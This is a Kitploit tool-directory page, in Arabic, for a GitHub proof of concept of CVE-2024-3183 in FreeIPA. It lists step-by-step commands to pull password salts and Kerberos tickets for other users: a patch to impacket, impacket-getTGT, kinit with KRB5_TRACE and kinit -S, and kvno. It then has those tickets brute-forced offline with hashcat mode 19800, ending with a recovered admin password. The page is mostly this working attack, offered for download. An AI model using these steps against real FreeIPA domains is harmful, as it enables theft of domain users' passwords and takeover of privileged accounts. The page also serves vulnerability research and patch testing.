Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3183-POC — إثبات المفهوم لـ CVE-2024-3183 (FreeIPA Rosting) | Kitploit
أدوات/GitHubGitHub/im10n/cve-2024-3183-poc
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقة
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

إثبات المفهوم لـ CVE-2024-3183 (FreeIPA Rosting)

عرض المستودع
2929منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3183-POC

إثبات مفهوم لـ CVE-2024-3183 (FreeIPA Rosting)

التأثير: يمكن لمستخدم ذي صلاحيات منخفضة الحصول على تجزئة (hash) لكلمات مرور جميع مستخدمي المجال وتنفيذ هجوم قوة عمياء غير متصل (kerberoasting).

تصحيح impacket-getTGT:

  1. أضف decoder.decode.defaultErrorState = stGetValueDecoderByTag إلى impacket/krb5/kerberosv5.py.
  2. استمتع!

POC1:

  1. أضف decoder.decode.defaultErrorState = stGetValueDecoderByTag إلى impacket/krb5/kerberosv5.py.
  2. يمكنك استخدام impacket-getTGT مع خيار -service وخيار -debug للحصول على الملح (salt) في أمر واحد. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. أولاً، لنطلب تذكرة TGT لمستخدم "admin" المخترق بالفعل. kinit user foto1
  2. ثانياً، سنجد ملح (salt) المستخدم "admin": printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. احصل على TGS للمستخدم "admin": kvno admin foto foto3
  4. استخدم سكريبت بايثون (أو hashcat mod 19800 مع الملح المحدد) لهجوم القوة العمياء على TGS foto4

1 - TGS، 2 - SALT، 3 - كلمات المرور.

  1. مبروك، لدينا الآن كلمة مرور المستخدم "admin".

POC3:

  1. يمكنك استخدام kinit لخطوة واحدة: kinit -S target user

وستحصل على TGT مشفر بمفتاح المستخدم الهدف.

تنزيل الأداة